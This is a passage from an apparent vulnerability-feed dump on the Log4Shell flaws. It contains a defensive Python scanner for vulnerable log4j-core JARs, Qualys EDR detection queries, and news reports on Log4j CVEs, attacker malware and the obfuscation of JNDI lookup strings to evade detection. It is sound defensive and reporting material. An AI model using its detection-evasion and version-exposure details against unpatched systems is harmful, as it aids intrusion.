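        return "jndi-removed: CVE-2021-44228/45046 closed; upgrade for CVE-2021-45105/44832"
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class stripped; upgrade when possible"
    if v == (2, 15, 0, 99, 0):
        return "partially-fixed: remote LDAP blocked by default, CVE-2021-45046 still applies"
    return "VULNERABLE: CVE-2021-44228"

def inspect(zf):
    """(version, has_jndi_lookup) for an open archive, or None if it is not log4j-core."""
    names = set(zf.namelist())
    props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
    version = next((ln.split("=", 1)[1].strip() for ln in props.splitlines() if ln.startswith("version=")), None)
    if version is None and JNDI_CLASS not in names:
        return None
    return version or "unknown", JNDI_CLASS in names

def scan_archive(label, data, findings):
    """Classify one archive, then recurse into JARs it embeds (WAR/EAR/fat JARs)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings.append((label, "?", "unreadable: not a zip archive"))
        return
    with zf:
        info = inspect(zf)
        if info:
            findings.append((label, info[0], classify(*info)))
        for name in (n for n in zf.namelist() if n.endswith(".jar")):
            scan_archive(f"{label}!{name}", zf.read(name), findings)

def scan_tree(root):
    """Walk a directory tree and classify every .jar/.war/.ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(f for f in files if f.endswith((".jar", ".war", ".ear"))):
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                scan_archive(os.path.relpath(path, root).replace(os.sep, "/"), fh.read(), findings)
    return findings

def _stub_jar(version, with_jndi=True):
    """Minimal in-memory JAR shaped like log4j-core (constructed stub, not a real artefact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed host: vulnerable, JndiLookup-stripped and patched JARs, plus a WAR embedding 2.15.0."""
    lib, webapps = os.path.join(root, "app", "lib"), os.path.join(root, "tomcat", "webapps")
    os.makedirs(lib)
    os.makedirs(webapps)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", _stub_jar("2.15.0"))
    files = {os.path.join(lib, "log4j-core-2.14.1.jar"): _stub_jar("2.14.1"),
             os.path.join(lib, "log4j-core-2.14.1-stripped.jar"): _stub_jar("2.14.1", with_jndi=False),
             os.path.join(lib, "log4j-core-2.17.1.jar"): _stub_jar("2.17.1"),
             os.path.join(webapps, "shop.war"): war.getvalue()}
    for path, data in files.items():
        with open(path, "wb") as fh:
            fh.write(data)

def demo():
    """Build the constructed tree in a temp dir, scan it, and return {label: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {label: status for label, _, status in scan_tree(tmp)}
```

`demo()` returns a mapping from archive path (nested JARs are written as `outer.war!inner.jar`) to status; on a real host call `scan_tree()` on the application directories and review everything not reported as `patched`. Because the version is read from the embedded `pom.properties`, a renamed or shaded JAR is still classified, which is exactly the case a command-line search for `log4j-core-2` misses.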
Use the following QQL in Qualys EDR to find instances of log4j2 being loaded:\n\n * process.arguments:" log4j-core-2"\n\nThis matches only hosts where the JAR name appears on the Java command line; a log4j-core JAR loaded from inside a WAR, a fat JAR or a classpath wildcard will not show up, so combine it with an on-disk inventory.\n\nAlternatively, as a broader search you can find all assets that are running Java in your environment by using the following QQL search:\n\n * process.name:"java"\n\n#### Detection Opportunity 5: Search for Known Payloads\n\nPost exploitation activities (after an adversary gains access) often include dropping various malware families on the box. The malware that gets deployed will be entirely dependent on the adversary taking the action. The following malware families have been observed exploiting Log4Shell already:\n\n * Bazarloader\n * Mirai\n * Various Cryptocurrency Mining Software\n\nThe presence of Bazarloader leads Qualys to believe that this vulnerability will be actively used by some of the more well-known adversarial groups. Searching for the presence of malware and performing a comprehensive incident response into where it originated is especially important given the prevalence of the Log4Shell vulnerability.\n\n#### Detection Opportunity 6: Find Evidence of Exploitation Attempts\n\nFor Qualys EDR customers who are leveraging the AntiMalware engine, there are specific detections that can be searched within the environment to find evidence of someone attempting to exploit this vulnerability. These detections specifically look at the network traffic which the java process generates when performing the JNDI lookups mentioned above.\n\nTo find these exploit attempts, you can leverage the following queries:\n\n * event.networkDetectionName:"Exploit.HTTP.CVE-2021-44228.Log4Shell"\n * event.networkDetectionName:"Exploit.CVE-2021-4228.Log4Shell"\n\n\n### Key Points\n\nWhile the Log4Shell vulnerability is grabbing headlines around the world, it is important to remember that there remain other active threats.
Proactively preventing, detecting, and responding to adversarial behavior will ensure that you are protected against all of them.\n\nEach of these 6 detection opportunities and how Qualys prevents Log4Shell attacks are described in this recent blog. Additionally, leveraging the MITRE ATT&CK framework to hunt for post exploitation activity can yield valuable insights while hunting for adversarial activity. Looking at an [adversarial playbook](<https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware>), we know that some of the initial steps an attacker will take are performing reconnaissance to get situational awareness, lateral movement to find your \u201ccrown jewels\u201d, and credential access to make their attacks successful.\n\nSearching for such activity is straightforward in Qualys EDR. For example, tactic-level searches such as these surface the corresponding behaviors:\n\n * mitre.attack.tactic.name: "Reconnaissance"\n * mitre.attack.tactic.name:"Lateral Movement"\n * mitre.attack.tactic.name:"Credential Access"\n\n### Prevent Future Attacks\n\nPatching with a software vendor's security update is the best bet to plug known vulnerabilities. Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>) can also [remove](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) the JndiLookup.class to neuter the exploitation of Log4Shell altogether.\n\nMulti-Vector EDR is continually updated with the latest threat intelligence and detection techniques to constantly monitor endpoints and to protect against existing and future exploits of the Log4Shell vulnerability.\n\nThe Qualys Malware Threat Research Team anticipates that what we know today is just the tip of the iceberg. We predict that there will be an avalanche of malware and attacks exploiting Log4Shell throughout the remainder of 2021 and 2022.
You can be assured that we will continue monitoring the situation 24/7 to ensure coverage of any new exploit techniques.\n\n### Free 30 Days of Qualys Multi-Vector EDR\n\nTo help security teams protect, detect, and respond to Log4Shell Exploits, Qualys is offering [Multi-Vector EDR free for 30 days](<https://www.qualys.com/forms/endpoint-detection-response/>). Sign up today to take advantage of this limited time offer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T05:41:36", "type": "qualysblog", "title": "6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4228", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-20T05:41:36", "id": "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:47", "description": 
"Cybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection.\n\n\"This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability,\" Matthew Warner, CTO of Blumira, [said](<https://www.blumira.com/analysis-log4shell-local-trigger/>). \"At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.\"\n\n[WebSockets](<https://en.wikipedia.org/wiki/WebSocket>) allow two-way communication between a web browser (or other client application) and a server, unlike HTTP, which is request-response: the client sends a request and the server returns a response.\n\nWhile the issue can be resolved by updating all local development and internet-facing environments to Log4j 2.16.0, Apache on Friday rolled out [version 2.17.0](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), which remediates a denial-of-service (DoS) vulnerability tracked as CVE-2021-45105 (CVSS score: 7.5), making it the third Log4j 2 flaw to come to light after [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) and [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>).\n\nThe complete list of flaws discovered to date in the logging framework after the original 
[Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) remote code execution bug was disclosed is as follows \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0) \n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)\n\n\"We shouldn't be surprised that additional vulnerabilities were discovered in Log4j given the additional specific focus on the library,\" Jake Williams, CTO and co-founder of incident response firm BreachQuest, said. \"Similar to Log4j, this summer the original [PrintNightmare](<https://thehackernews.com/2021/07/researcher-uncover-yet-another.html>) vulnerability disclosure led to the discovery of multiple additional distinct vulnerabilities. The discovery of additional vulnerabilities in Log4j shouldn't cause concern about the security of log4j itself. If anything, Log4j is more secure because of the additional attention paid by researchers.\"\n\nThe latest development comes as a number of threat actors have piled on the Log4j flaws to mount a variety of attacks, including ransomware infections involving the Russia-based Conti group and a new ransomware strain named Khonsari. 
What's more, the Log4j remote code execution flaw has also opened the door to a third ransomware family known as TellYouThePass that's being used in attacks against Windows and Linux devices, according to researchers from [Sangfor](<https://www.secpulse.com/archives/171335.html>) and [Curated Intel](<https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html>).\n\n## Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway\n\nThe easily exploited, ubiquitous vulnerability, aside from spawning as many as 60 variations, has presented a perfect window of opportunity for adversaries, with Romanian cybersecurity firm Bitdefender noting that more than 50% of the attacks are leveraging the Tor anonymity service to mask their true origins.\n\n\"In other words, threat actors exploiting Log4j are routing their attacks through machines that are closer to their intended targets and just because we don't see countries commonly associated with cybersecurity threats at the top of the list does not mean that attacks did not originate there,\" Martin Zugec, technical solutions director at Bitdefender, [said](<https://businessinsights.bitdefender.com/log4shell-the-call-is-coming-from-inside-the-house>).\n\nAccording to telemetry data collected between December 11 and December 15, Germany and the U.S. alone accounted for 60% of all the exploitation attempts.
The most common attack targets during the observation period were the U.S., Canada, the U.K., Romania, Germany, Australia, France, the Netherlands, Brazil, and Italy.\n\n## Google: Over 35,000 Java Packages Affected by the Log4j Flaw\n\nThe development also coincides with an analysis from Google's Open Source Insights Team, which found that roughly 35,863 Java packages \u2014 accounting for over 8% of the Maven Central repository \u2014 use vulnerable versions of the Apache Log4j library. Of the affected artifacts, only around 7,000 packages have a direct dependency on Log4j; the rest pull it in transitively.\n\n\"User's lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability,\" Google's James Wetter and Nicky Ringland [said](<https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html>). But on the positive side of things, 2,620 of the impacted packages have already been fixed less than a week after disclosure.\n\n\"There will likely be some time before we understand the full fallout of the log4j vulnerability, but only because it's embedded in so much software,\" Williams said. \"This has nothing to do with threat actor malware. It has to do with the difficulty in finding the myriad places the library is embedded. The vulnerability itself will provide initial access for threat actors who will later perform privilege escalation and lateral movement \u2013 that's where the real risk is.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:18:00", "type": "thn", "title": "New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T05:03:39", "id": "THN:76D7572EDBE770410D6F0518DAD8B0AD", "href": "https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "Microsoft is warning of continuing attempts by nation-state 
adversaries and commodity attackers to take advantage of [security vulnerabilities](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.\n\n\"Exploitation attempts and testing have remained high during the last weeks of December,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in revised guidance published earlier this week. \"We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.\"\n\nPublicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), has emerged as a new attack vector for [widespread exploitation](<https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html>) by a variety of threat actors.\n\nIn the subsequent weeks, four more weaknesses in the utility have come to light \u2014 [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>), [CVE-2021-45105](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>), and [CVE-2021-44832](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) \u2014 providing opportunistic bad actors with persistent control over the compromised machines and mount an evolving array of attacks ranging from [cryptocurrency miners](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) to [ransomware](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>).\n\nEven as 
the mass scanning attempts are showing no signs of letting up, attackers are also obfuscating the JNDI lookup strings they plant in HTTP requests (for example by nesting other Log4j lookups inside the \"${jndi:...}\" pattern) so that signature-based, string-matching detections miss the request that, once logged by Log4j, makes the server reach out to the attacker-controlled site.\n\nIn addition, Microsoft said it observed \"rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) backdoor to Linux systems.\"\n\nOn top of that, the Log4Shell vulnerability has also been put to use to drop additional remote access toolkits and reverse shells such as [Meterpreter](<https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter>), [Bladabindi](<https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat>) (aka NjRAT), and [HabitsRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat>).\n\n\"At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,\" MSTIC noted. \"Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, [requiring](<https://twitter.com/MsftSecIntel/status/1475627081753112579>) ongoing, sustainable vigilance.\"\n\nThe development also comes as the U.S. 
Federal Trade Commission (FTC) [issued](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) a warning that it \"intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T05:12:00", "type": "thn", "title": "Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-05T05:13:47", "id": "THN:933FE23273AB5250B949633A337D44E1", "href": 
"https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:45", "description": "The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.\n\nTracked as [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-beta7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n\n\"Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. 
\"This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\"\n\nAlthough no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry [claimed credit](<https://twitter.com/YNizry/status/1475764153373573120>) for reporting the vulnerability to Apache on December 27.\n\n\"The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,\" Nizry [noted](<https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/>). \"Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.\"\n\nWith the latest fix, the project maintainers have addressed a total of four issues in Log4j since the [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw came to light earlier this month, not to mention a fifth vulnerability affecting versions Log4j 1.2 that will not be fixed \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 
2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)\n\nThe development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. [issued](<https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html>) a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T04:59:00", "type": "thn", "title": "New Apache Log4j Update Released to Patch Newly Discovered Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", 
"CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T05:00:00", "id": "THN:1D10167F5D53B2791D676CF56488D5D9", "href": "https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi5u3P4_hPrWtSmhgDZPiVltBgMpBxNkK1fHd-IqQfVHIm618vLgTxNl2hfeK4i3CfSGH0ORwL654UZMADrYgPjOZNW5ZNfjXogHkEJbsrZLyS0OLrDd1d3pO8QWA10tcCz30cQJ0MCOOaPudPa_bQVOnMNzhyJ0c0HhkO94hlQbY5Bax2lHFUj_2SW>)\n\nWeb infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a [second bug](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.\n\nThe new vulnerability, assigned the identifier [CVE-2021-45046](<https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/>), makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug \u2014 CVE-2021-44228 aka Log4Shell \u2014 was \"incomplete in certain non-default configurations.\" The issue has since been addressed in Log4j version 2.16.0.\n\n\"This vulnerability is actively being exploited and anyone using Log4j should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0,\" Cloudflare's Andre Bluehs and Gabriel Gabor [said](<https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/>).\n\nEven more troublingly, researchers at security firm Praetorian warned of a [third separate security 
weakness](<https://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data/>) in Log4j version 2.15.0 that can \"allow for exfiltration of sensitive data in certain circumstances.\" Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.\n\n\"2.16 disables JNDI lookups by default and \u2014 as a result \u2014 is the safest version of Log4j2 that we're aware of,\" Anthony Weems, principal security engineer at Praetorian, told The Hacker News. When reached for a response, the Apache Logging Services Project Management Committee (PMC) confirmed that \"We have been in contact with the engineer from Praetorian to fully understand the nature and scope of the problem.\"\n\nThe latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of [Hafnium](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) and [Phosphorus](<https://thehackernews.com/2021/07/iranian-hackers-posing-as-scholars.html>), have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over [1.8 million attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) to exploit the Log4j vulnerability have been recorded so far.\n\nMicrosoft Threat Intelligence Center (MSTIC) [said](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. 
In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.\n\nWhile it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.\n\n\"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more,\" industrial cybersecurity firm Dragos [noted](<https://www.dragos.com/blog/industry-news/implications-of-log4j-vulnerability-for-ot-networks/>).\n\n\"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks,\" the company added.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T06:24:00", "type": "thn", "title": "Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T05:54:33", "id": "THN:5BAE3325983F971D1108722C454FF9AB", "href": 